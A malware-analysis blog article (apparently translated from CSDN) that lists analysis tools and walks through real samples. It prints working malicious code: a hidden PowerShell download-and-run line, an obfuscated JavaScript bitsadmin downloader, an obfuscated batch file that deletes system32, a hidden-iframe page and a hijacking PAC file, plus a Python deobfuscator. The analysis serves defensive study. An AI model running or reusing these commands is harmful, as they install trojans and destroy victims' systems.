Brief analysis of malicious code

Foreword:

There are many types of malicious code. Not only EXE executable programs can carry malicious code, but office documents and script programs can also carry malicious code. The analysis of malicious programs is generally the same as the analysis of ordinary programs. This article mainly introduces the analysis methods of various types of malicious code and some classic malicious code analysis practices.

1. Analysis tools:

If you want to do your job well, you must first sharpen your tools, so we start with the tools used to analyze malicious code. When analyzing a suspected virus, never run it on your own machine, regardless of whether the program turns out to be harmful, to avoid unnecessary trouble. The virtual machine does not need a recent Windows version: XP is generally enough, and you can configure an additional Win7 virtual machine. The most basic static analysis tools for malicious programs are IDA (disassembler), EXEinfo (packer detection), StudyPE (PE structure editor), 010Editor (binary/hex viewer), Hiew (file viewer, useful for script files) and Dnspy (.NET decompiler). Dynamic analysis tools: OllyDbg and x64dbg. The list below contains the tools used during the analyses in this article; all of them can be downloaded from Wuai Crack (52pojie).

  • Tool list

  • Virtual machine environment:

    • WinXP: the Wuai Crack dedicated virtual machine

    • Win7: self-configured

  • Static analysis tools: IDA, EXEinfo, StudyPE, CFF Explorer, 010Editor, Total Commander, Hiew, Dnspy

  • Dynamic analysis tools: OD, X64dbg

  • Others: fakenet

2. Classification of malicious programs:

Malicious programs can be divided into many types. According to file type, they can be divided into:

  • PE files (Windows platform executable files, such as exe and dll files)

  • ELF file (executable file under Linux platform)

  • Office document files (note that Office 2007 is the dividing line: document files from before 2007 are essentially binary files, while those from 2007 onward are essentially compressed archives)

  • hta file (HTML application)

  • ps1 file (powershell script)

  • js file (JavaScript script)

  • VBS file (vbs script)

  • bat file (windows batch file)

  • chm file (Microsoft help document)

  • lnk file (link file)

When analyzing malicious programs it is also usual to classify them by behavior. Common behavior categories include Downloader, Virus, Dropper, Ransom, Exploit, Trojan, Redirector and Phish.

3. Examples of script-type malicious programs:

1. PowerShell script:

Corresponding file: 0cddd8c2084adb75689b5855a70cc4a8

The suffix name of the powershell script is .ps1. The following is the specific content of the file:

powershell.exe -noe -nol -nop -noni -w Hidden -ex Bypass -c (New-Object System.Net.WebClient).DownloadFile('http://188.120.250.154/7766.exe', '%Temp%\EUKYZG.pif');
(New-Object -com Shell.Application).ShellExecute('%Temp%\EUKYZG.pif');
  1. Note the Hidden parameter, which means the script runs in a hidden window. -w is the short form of -WindowStyle, so the full parameter (for example on Win10) is: -WindowStyle Hidden

  2. The DownloadFile method downloads a file: here it fetches http://188.120.250.154/7766.exe into the %Temp% temporary folder and saves it as EUKYZG.pif. Tip: the .pif file type is the format Windows uses to run DOS programs, and Windows treats it as an executable.

  3. The ShellExecute method executes the specified program: here it runs the file that was just downloaded.

Based on the above information, it can be inferred that this script is used to download and execute Trojans.

2. JavaScript script:

Corresponding file: 44dcace0cfa9c0f6be1965841bc11410

The suffix of the javascript file is: .js. The following is the specific content of the file:

var lildz = new ActiveXObject("shell.application"); 
var am = String.fromCharCode( 99,109,100,46,101) 
var kk = " h^t^tp://www.sinakhat^ibi.c^om/121016.e^xe %appdata%\\keos.exe     &start %appdata%\\keos.exe" 
lildz.ShellExecute (am+"xe"," /c bitsadmin   /tr^an^sfer my^job /do^wnload /prio^rity hi^gh"+kk, '', 'open',0);

The three var statements define three variables:

  • new ActiveXObject("shell.application"): creates a shell object

  • String.fromCharCode: converts the listed character codes back into a string

  • The last variable holds a URL and a command, but the URL is deliberately broken up with ^. " and ^ are the most common escape characters in CMD commands, and paired quotes and carets do not affect how the command executes.

Reference: "Method to bypass WAF running command execution vulnerability", Lao Liang's technical station, https://www.bug234.com/article/61

Finally, the ShellExecute method is used to launch the assembled command line. This script is therefore also used to download and execute Trojans.

Extension: a PAC (Proxy Auto-Configuration) file is also implemented as JavaScript. Its core is a single JavaScript function that decides, for each web request (HTTP, HTTPS or FTP), whether the browser should connect directly to the target address or go through a web proxy server. The function's signature is:

function FindProxyForURL(url, host) {
  // ...
}

For Example: Take the file b5b98837ede4701a98f1467ab53160fb as an example:

function FindProxyForURL(url, host) {  
	if (shExpMatch(host, "www.google.*")) return "PROXY 127.0.0.1:8080";
	if (shExpMatch(host, "www.bing.com")) return "PROXY 127.0.0.1:8080";  
	return "DIRECT";
}

This PAC file sends every request for Google and Bing hosts through a proxy on the loopback address (127.0.0.1:8080), where the attacker's program can intercept them; everything else connects directly.

3. VBScript script:

Corresponding file: bc70dba947cd5df9fd750353da3faed7

The suffix of the file is .vbs. The following is the specific content of the file (the code is too long to paste in full):

A file that begins with dIm (the Dim keyword) is a telltale sign of a VBScript file.

4. Batch processing program:

Corresponding file: 84f1fa3c698915b91257706d1e4e3f0e

The suffix of the file is: .bat. The following is the specific content of the file:

@echo off
c%FH_DJJU_GSG_FmJjFPRQqgdycQAzVMvfDWRo%a%FH_DJJU_GSG_FjFujOkkOOMcLovIGAGoYrZUcnjM%l%FH_DJJU_GSG_FHTVGdEtZSPwMcCCyWHZIMwDFE%l%FH_DJJU_GSG_FEBiBBlqGBpzjWbYdAUmtssHjkG% %FH_DJJU_GSG_FkfaXOiEDWPZJlPnBgVIOwkne%:%FH_DJJU_GSG_FnBIoMwczQqxBcEPVmougN%H%FH_DJJU_GSG_FTgWqkLHnwwpWCORFmFZAOrDgfQNVS%s%FH_DJJU_GSG_FmTWAAzdrAdyRZPoxdWfIwXqnSIZUs%Z%FH_DJJU_GSG_FpcDDzovELVJClgpbrAxVjHqxCnzaJa%c%FH_DJJU_GSG_FDwAhPrlrMoBPkmYTFqGtYJKEMQKEt%G%FH_DJJU_GSG_FFmsJfcZXakmGLJsyVcGLvHMriTeu%o%FH_DJJU_GSG_FqcERJTeeYmtAIeEYqHXZ% %FH_DJJU_GSG_FyJZdHGkQCZFzIECPEodzsIdWfBcyio%c%FH_DJJU_GSG_FGjuIFwEgnuBFnQzZiqjU%h%FH_DJJU_GSG_FDOiuCKlyKGzVajguDVoY%c%FH_DJJU_GSG_FagRkXxCdKUIMurtMouGxwqYZmUz%p%FH_DJJU_GSG_FaoASDpEEiuiUopYeIBhu% %FH_DJJU_GSG_FfSUoRXcLzpnGWoqYuTCwqYRixDmxJj%6%FH_DJJU_GSG_FdYNxUMGuOMYDJijNkiletlrKBURzJ%5%FH_DJJU_GSG_FKVOjRrIUbDOGNBJDzQXsJtffamStO%0%FH_DJJU_GSG_FCfbXyEYSzSmqdagQOstBqH%0%FH_DJJU_GSG_FprYRxiOhroqQKVFsjriqD%1%FH_DJJU_GSG_FZefSZaTzzRXuHHMxZHBtRQYoTiyExI%
c%FH_DJJU_GSG_FXGyLNNJmAfYMGYWhwEfhCLBhFcbeNb%a%FH_DJJU_GSG_FAiXNgfEIVAxryMNMxNnvanLuYdWqg%l%FH_DJJU_GSG_FRbiwBmWutJshuzLkSqPjqfssJfGzYn%l%FH_DJJU_GSG_FweEwywOAHlTFSvQSnKJRPXRHL% %FH_DJJU_GSG_FKqgZtBhimBXDUYgftDOfBFC%:%FH_DJJU_GSG_FxSWnrZiDEZYbGAZRDzzV%z%FH_DJJU_GSG_FrHOBDQsrvDKsAtzhwGNshdbMRr%R%FH_DJJU_GSG_FxVvukcuRAPfjRPHwNLgFjtiY%m%FH_DJJU_GSG_FULFaKRQJFlyEYIgQVVtWUnllFIiCgf%G%FH_DJJU_GSG_FmuYctzMTQnbpZqhSNcIvA%D%FH_DJJU_GSG_FrLgIvmPUUeUAVXJUIzIz%a%FH_DJJU_GSG_FaFtafIlXERVgciSbzIwwnybk%H%FH_DJJU_GSG_FjJYKBIrtedYGKAydReSgysvQVlp% %FH_DJJU_GSG_FkufGHcpMDciTYrMxhatFc%s%FH_DJJU_GSG_FxPFzIvHkurbHUmZNrXxLd%e%FH_DJJU_GSG_FJIADTVZAUSPCHyvDGqevEdPBajeO%t%FH_DJJU_GSG_FBhDDiLwMzTfYYFnfOGnnNb% %FH_DJJU_GSG_FodnqRMGynANJoVgPbTcVyugVLND%c%FH_DJJU_GSG_FHGKPvxEepqOyCfNjAqpQQw%x%FH_DJJU_GSG_FQCJDLmYNwVwwRhmhQrgw%Z%FH_DJJU_GSG_FgpiFpnCohnubmnfGNKWyZfBjT%c%FH_DJJU_GSG_FDTOBsXzhJOYhiladWFQiBoWfmNnBYw%V%FH_DJJU_GSG_FuKVLNewsYyQWfkWUGblMYtYRld%r%FH_DJJU_GSG_FFjProVUkBjkbwQlbplHawZXh%c%FH_DJJU_GSG_FBVezpjJwNknskWcvboHlKbwnzbQjl%
"%FH_DJJU_GSG_FCnxereSZqMRQBKaKMxJAmNaiZMbylM%Z%FH_DJJU_GSG_FJzEjEgciZoEMuRRdpbDSwx%m%FH_DJJU_GSG_FQiKMmpTUNqJanCsrDDWq%l%FH_DJJU_GSG_FxFLEZrpnPPLTirZkJyDRmdUne%P%FH_DJJU_GSG_FMKrXtRopKxxTpCGrlqdRoE%Z%FH_DJJU_GSG_FFoMdJSxofBqaAucTAQKNBhgQdai%E%FH_DJJU_GSG_FxmnGKeIOUOqNPJCwvLqBzXRMn%Z%FH_DJJU_GSG_FfCyBMqUeuMSRwWkwonywgBYldQUJgX%Z%FH_DJJU_GSG_FbSxrlExrQrdudwMvZUvdDzNBghm%"%FH_DJJU_GSG_FvOxbotGfJOEuZwsJrbTOeSGLN%
c%FH_DJJU_GSG_FGvrXfgZeoWCyUxBHAxvGZ%a%FH_DJJU_GSG_FmEawHwqAFXBQawusrRpxbfEqX%l%FH_DJJU_GSG_FXlUJyYTjaHkXcVMHqdsIIV%l%FH_DJJU_GSG_FoRuOejvrQKKHMkWpCwOaLO% %FH_DJJU_GSG_FCkjaSKQycOmRJcECcfZMq%:%FH_DJJU_GSG_FFEVSspNnqnSlJKXjPhtNfBmBuXk%z%FH_DJJU_GSG_FGYwBWwDlDBikvhEncEBwawW%R%FH_DJJU_GSG_FLucciiSswOArNlPchaGOc%m%FH_DJJU_GSG_FEhuGXIsPVrQZnxvYiktyIvG%G%FH_DJJU_GSG_FMnyRjDpLmQxCRCzOSdUeAhVRcs%D%FH_DJJU_GSG_FYjnVSaRvBmewJilUyTlp%a%FH_DJJU_GSG_FxquWjKAHfYaVIKrzqkNNl%H%FH_DJJU_GSG_FgihFQYIPOGKNFDGfVGOMpGEd% %FH_DJJU_GSG_FuuGuxYQhQiRBAueTdSWETGVqB%s%FH_DJJU_GSG_FpQGfbLnOTuEUZfitbepazj%e%FH_DJJU_GSG_FlsnndrSnQYHbqsbsIaSkZHCg%t%FH_DJJU_GSG_FzVpzRpdwlEMLpKJDHIgJNLbEcW% %FH_DJJU_GSG_FXoQnuFtGNaVIttPzqipfPwTYRadl%X%FH_DJJU_GSG_FFTVYClGDUpOjxNpgGgdoftL%f%FH_DJJU_GSG_FwJVsEOTJjMmADevEaVGi%G%FH_DJJU_GSG_FYNEABPShCLEWQmNjlrZqw%M%FH_DJJU_GSG_FTnuzPfcBIQDUGJMiRUziGpH%a%FH_DJJU_GSG_FGXNPdKaKzCGODVPIjRCXsiRARHtLH%h%FH_DJJU_GSG_FxCYmttgovVVmSzsGlAJz%I%FH_DJJU_GSG_FAcCQzNMBKoCJlShxZOtaa%Q%FH_DJJU_GSG_FCAuZeGYJlgQXSzWXUuBWqkhcTsKNCN%i%FH_DJJU_GSG_FCSOoGiXedKrHWTsLCGBwzRmd%
"ZmtwSE%FH_DJJU_GSG_FIcwmSzfsXVhNhiseiogzMb%5Jbg=="%FH_DJJU_GSG_FZCCZsoGCQpCMpoBzqTzEXmUpWvrpJi%
ca%FH_DJJU_GSG_FSFqbNsGkahNqIORnwlVrNxURyF%ll%FH_DJJU_GSG_FOzJLBQahFlGiZcBLLMjllMq% :%FH_DJJU_GSG_FJrBxsuvrWVpiQgWqEhbRWStFKGZ%zR%FH_DJJU_GSG_FqKpLOpjaVUEYrLYDWHLAwxxOKr%mG%FH_DJJU_GSG_FiXtOMaGxoYdVkJxBVmDIdUBIeo%Da%FH_DJJU_GSG_FSiSiUMraMxdSQDyqkvuTtZ%H %FH_DJJU_GSG_FCXlISYNGcZYSmrbYjPgOwgFIofCj%se%FH_DJJU_GSG_FeXxFbQOEvpyklgtLRzFniXVfNIHR%t %FH_DJJU_GSG_FYyWOPUIhiPzpSMvyHtSQtpYDr%At%FH_DJJU_GSG_FRugPKAvsOcfhFFOxvyZvrZzMkRf%YR%FH_DJJU_GSG_FZycmRMuwgUyLhQYfszpy%DM%FH_DJJU_GSG_FkODkunWmzDMNKtMpmhfD%pf%FH_DJJU_GSG_FWXuuvlgOuKzJarLXpTthEPBRRItW%nC%FH_DJJU_GSG_FZgtdivcReLSIowVxZjKHX%
"%FH_DJJU_GSG_FeOoJWVKNBbAkwBwXEOBi%T%FH_DJJU_GSG_FRGNotfIdBYzdPZnDJrcvONYcuBvs%0%FH_DJJU_GSG_FRZZiuLbIhcPJKWldpAbBkyBOmMLm%p%FH_DJJU_GSG_FGikYTAnsqqgZFpcfQcEqncbVZ%j%FH_DJJU_GSG_FYndXTrpPuEbsgfPFSxTvNkCnzHL%U%FH_DJJU_GSG_FXzlTBBWLfSUsmELdngLwotD%X%FH_DJJU_GSG_FZWhtyNKBcBGrqeoylVXjAKqYeE%Z%FH_DJJU_GSG_FSkcduuamUgZTzMMgsLLJJIyzk%V%FH_DJJU_GSG_FUqesSNhelGwHCgngMBuuckvyMSlOB%e%FH_DJJU_GSG_FlXHhbIBjdkmTGOQkEgnbgyFjz%G%FH_DJJU_GSG_FFgSHDqUDjpyPXDMmxSufYzctWqqoA%t%FH_DJJU_GSG_FusAyMltjpIvLZfYRqJAmYOubJZg%u%FH_DJJU_GSG_FWbTozPSHkTyijrYOpWYpjtIP%W%FH_DJJU_GSG_FTvuMuMTENiwrxhzQsYEXnKijcYyQC%A%FH_DJJU_GSG_FMYWyxZfzlNpjiSrgMQujVZjIdPErJ%=%FH_DJJU_GSG_FsIdNORqsxODHyBffNeMudJ%=%FH_DJJU_GSG_FoKiSAgCzxdoMqqbKfynyHtZCGi%"%FH_DJJU_GSG_FOpLShEHbpOEaHclLMDqOqjOV%
cal%FH_DJJU_GSG_FhTgkpdehkFYFvTmIzIxnym%l :%FH_DJJU_GSG_FPHGjbTnzDbNuqPznpkgB%zRm%FH_DJJU_GSG_FvYnOIczcpPjPmCvgtgIuNgMT%GDa%FH_DJJU_GSG_FuPgPGuEwjPtAVDfbyyNPcPgXWuqa%H s%FH_DJJU_GSG_FMHxQdguWBkxWpYagMKwLAcYq%et %FH_DJJU_GSG_FXieorZQfUDJuQLVYgpfroHZh%zPO%FH_DJJU_GSG_FtSjVotkXKytbkphnZnTjdai%RyE%FH_DJJU_GSG_FDuIXhzSOfOmkdzDTuTmSfncb%FhR%FH_DJJU_GSG_FXPseWuHmDacJvJihzZTeKci%a%FH_DJJU_GSG_FzfoyGRAuSaxQwjMGBDTIn%
"%FH_DJJU_GSG_FHJpaFgComgnLLlxMGmYZqInZQJ%a%FH_DJJU_GSG_FMoSoEZfGywTKQudhBnctIGgZwfYT%m%FH_DJJU_GSG_FvbQsiFMtDSnAkjgYcEXAdAwftAw%Z%FH_DJJU_GSG_FFYqeJJaMuZCgCgBTPiVmbxdVE%B%FH_DJJU_GSG_FYqmXghKHFHwbpSmatsJLUjoZxo%V%FH_DJJU_GSG_FJZDqGRqnNpkkUXRhUrAtKBgg%E%FH_DJJU_GSG_FcoXGXTmFFykvPCruprDpOkn%F%FH_DJJU_GSG_FZUbozzhXrEgciIwWCIRqJcxQsM%y%FH_DJJU_GSG_FLQBdviQsZpXpKCGyoFkCQLaZTT%V%FH_DJJU_GSG_FkqhrmmxfCbEReyjVBodaek%0%FH_DJJU_GSG_FjmCLSOWeaGPxJdxINIbLgZHjdkvF%N%FH_DJJU_GSG_FozDjXsrRaSrztuapdnUCYDkP%S%FH_DJJU_GSG_FXoFuoKJmdToZhXlODdfyQNzbOk%S%FH_DJJU_GSG_FPKBOEeVWtoRaEvLfVHRBWeODJsUjAP%Q%FH_DJJU_GSG_FQOLjhVBeljAwNVQAuukbkdCjmcktys%=%FH_DJJU_GSG_FtxkWMEifCLopOBstbbzfwlAqKzmink%=%FH_DJJU_GSG_FqQWeSmzMLQYeKUdnYHkCsTwZn%"%FH_DJJU_GSG_FXlQMtzDvfsNxbhLocUgHQPkSvv%
c%FH_DJJU_GSG_FSNUMHHPbNowtqrZfRYsEXGQ%a%FH_DJJU_GSG_FzxGLLjkiDsAxRAxVVKXIqRtDxzHx%l%FH_DJJU_GSG_FmDNWGyRKTszojGZnjIqfomSbFBb%l%FH_DJJU_GSG_FMEEpeCiFHGpDafCoHKbwwqd% %FH_DJJU_GSG_FbviYnwVDzsmVImBvtEjkkQN%:%FH_DJJU_GSG_FJsZUtWMBcVUsoUidWmMXp%H%FH_DJJU_GSG_FwoHKILjyZUrlEQhAJdnSsxheznKrZ%s%FH_DJJU_GSG_FvxrlpbqdZrFinIUXPkjCkbmk%Z%FH_DJJU_GSG_FQQehcGqqEeiORPxOnmHZUALyKiEcYT%c%FH_DJJU_GSG_FOynpCbFnbmrsJHMdRtXblunmLHz%G%FH_DJJU_GSG_FOffhXiFwodzYKFmbWzhcqDrMxIBLzR%o%FH_DJJU_GSG_FNQIlZfnoNqmEEZNyaKWkJeMVAm% %FH_DJJU_GSG_FrZnIywEvXhboDZAzporDenHEHC%c%FH_DJJU_GSG_FttTbykITuQLYHBZSiJHRjgfTDHlS%h%FH_DJJU_GSG_FqnluMNtMVYynpNmlaEpxWeBd%c%FH_DJJU_GSG_FRbdeKvGZNpqQzQpVKBKBAIkN%p%FH_DJJU_GSG_FAnrfOZWtGJnKgMgLMyIyi% %FH_DJJU_GSG_FABQvsRMupWbhTRWSrosI%8%FH_DJJU_GSG_FaEsnYGqhRfrEDnCeSbEO%6%FH_DJJU_GSG_FAmcvUglPafZSoOcljXwpYcR%6%FH_DJJU_GSG_FPLrARySTyDEqduPwMRxs%
%cxZcVrc%%XfGMahIQi%%AtYRDMpfnC%%zPORyEFhRa%
EXI%FH_DJJU_GSG_FBSVbiGwgbMPJXWyWbecfOUBmj%T /%FH_DJJU_GSG_FoCqprxEAObECYJmQVZlfzrAFEM%B%FH_DJJU_GSG_FyayRgicTvmjyUbQVEmiUEF%
:HsZcGo
%~1 %~2>NUL
g%FH_DJJU_GSG_FsncFEctpVPBiubqHgRlUnWYnOsiA%o%FH_DJJU_GSG_FvBCoNAZcTtvUGjXknUec%t%FH_DJJU_GSG_FHTdhLEafKqxXQntTTwPvCFImh%o%FH_DJJU_GSG_FuexfoxgCBfizubrGIGVa%:%FH_DJJU_GSG_FBHxqIjhzrgwwpXkXJlXvhIDf%e%FH_DJJU_GSG_FFSngKDJpembCwXMdBBJwobCbzA%o%FH_DJJU_GSG_FswxxEWbSODdVEwwIEEIqZbuDXP%f%FH_DJJU_GSG_FnHmLRscQkJaSRhCPcjpGUSQ%
:zRmGDaH
%~1 /p %~2=<"%~dp0%~2"
g%FH_DJJU_GSG_FYSxEdhzEulrYTsVYjQLLLVbSs%o%FH_DJJU_GSG_FHFAaOaLATmqxyWcLVmVnkOY%t%FH_DJJU_GSG_FiArNgRqoyXglqYDXGhVZIvpxqVq%o%FH_DJJU_GSG_FgzZbKPrcZfWDbTrogSMhWUfFYMV%:%FH_DJJU_GSG_FMgnsQwquCGqkChqetaoNhcwcix%e%FH_DJJU_GSG_FFTfkuGgPHHqzcLEaZNpDxMgFXY%o%FH_DJJU_GSG_FXNzpFeFfnEYyRyIIcheO%f%FH_DJJU_GSG_FrXuhMHzujbUUdtIjMBckKOpNtLg%

This batch code has been obfuscated and encrypted. It actually executes the following two commands:

call :FH_DJJU_GSG_F calc.exe
call :FH_DJJU_GSG_F cmd.exe /c del /f /s /q c:\windows\system32\*

The first command calls a label (:FH_DJJU_GSG_F) to run the calculator program (calc.exe). The label's job is to strip every %FH_DJJU_GSG_F…% reference from its parameters (these variables are never defined, so cmd.exe expands each reference to nothing) and splice the remaining characters together. For example:

call :FH_DJJU_GSG_F c%FH_DJJU_GSG_Fa%FH_DJJU_GSG_Fl%FH_DJJU_GSG_Fc%FH_DJJU_GSG_F.%FH_DJJU_GSG_Fe%FH_DJJU_GSG_Fx%FH_DJJU_GSG_FE

Equivalent to

call :FH_DJJU_GSG_F calc.exe

The second command calls the same label to run the command prompt (cmd.exe) with the parameter /c del /f /s /q c:\windows\system32\*. That parameter deletes every file in the system32 folder under the Windows folder on the C drive, regardless of whether the files are read-only, hidden or system files, which can leave the computer unable to start or run properly.
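The two tricks shown above, splitting a command with ^ in the JS sample and hiding every character of the batch file between junk variable references, can be reversed mechanically. The following Python is an added example, not code from the original post: the batch sample inside it is constructed in the style of the page's file with shorter junk names, the URL is a placeholder, and resolve_calls goes one step beyond the text by inlining the call :label lines with their %~1 %~2 bodies.

```python
import re

# Undefined %NAME% references expand to the empty string when cmd.exe runs a batch file;
# the sample above hides every command inside hundreds of such references.
JUNK_PREFIX = "FH_DJJU_GSG_F"  # junk variable prefix taken from the sample on this page
CALL_LINE = re.compile(r"^call\s+:(\S+)\s*(.*)$", re.IGNORECASE)

def strip_junk_vars(line: str, prefix: str = JUNK_PREFIX) -> str:
    """Expand every %<prefix>...% reference to nothing, exactly as cmd.exe would."""
    return re.sub("%" + re.escape(prefix) + r"[A-Za-z0-9_]*%", "", line)

def strip_carets(cmdline: str) -> str:
    """Remove cmd.exe's ^ escape character, which the JS sample uses to split its URL."""
    return cmdline.replace("^", "")

def deobfuscate_batch(script: str, prefix: str = JUNK_PREFIX) -> list[str]:
    """Return the non-empty lines of a batch script with junk references removed."""
    lines = (strip_junk_vars(raw, prefix).strip() for raw in script.splitlines())
    return [ln for ln in lines if ln]

def resolve_calls(lines: list[str]) -> list[str]:
    """Inline 'call :label a b' with the label's one-line body, substituting %~1, %~2, ...
    (handles only the label-followed-by-one-command pattern seen in the sample)."""
    bodies = {ln[1:].lower(): lines[i + 1] for i, ln in enumerate(lines[:-1]) if ln.startswith(":")}
    out = []
    for ln in lines:
        m = CALL_LINE.match(ln)
        if not m or m.group(1).lower() not in bodies:
            out.append(ln)
            continue
        body = bodies[m.group(1).lower()]
        for n, arg in enumerate(m.group(2).split(), start=1):
            body = body.replace(f"%~{n}", arg.strip('"'))  # %~n drops surrounding quotes
        out.append(body)
    return out

# Constructed sample in the style of the page's batch file, with short junk names for readability.
SAMPLE = """@echo off
c%FH_DJJU_GSG_FaBc%a%FH_DJJU_GSG_FdEf%l%FH_DJJU_GSG_FgHi%l %FH_DJJU_GSG_FjKl%:HsZ%FH_DJJU_GSG_FmNo%cGo c%FH_DJJU_GSG_FpQr%hcp 65001
EXI%FH_DJJU_GSG_FsTu%T /B
:HsZcGo
%~1 %~2>NUL
g%FH_DJJU_GSG_FvWx%oto:eof
"""

if __name__ == "__main__":
    print("\n".join(resolve_calls(deobfuscate_batch(SAMPLE))))
    print(strip_carets("h^t^tp://exa^mple.c^om/pay^load.e^xe"))  # constructed URL, not the sample's
```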

4. Examples of document-based malicious programs:

1. HTML application (hta file):

Corresponding file: 0ca5700d367fc48a3de7b32a4042aa9e

The suffix of the HTA program is .hta. Open the program with Notepad:

The first suspicious place is in the first line: windowstate="minimize", which refers to executing the program with a minimized window.

After it runs, it tries to open a website and download a Trojan:

2. HTML file:

Corresponding file: 57651da2b0025c3fc4a12ef5c4a82603

The suffix is: .html. The following is the specific content of the file:

<html><body bgcolor="#FFFFFF"><iframe src="http://u7z.ru:8080/index.php" width=175 height=171 style="visibility: hidden"></iframe></body></html>

The visibility: hidden style keeps the iframe invisible, so the page loads http://u7z.ru:8080/index.php without the user seeing it.

3. PDF file:

Corresponding file: 57651da2b0025c3fc4a12ef5c4a82603

The suffix is: .pdf, try to open this pdf file:

The file contains nothing but a hyperlink; this PDF serves only as a springboard to that link:


Origin blog.csdn.net/weixin_46175201/article/details/133088059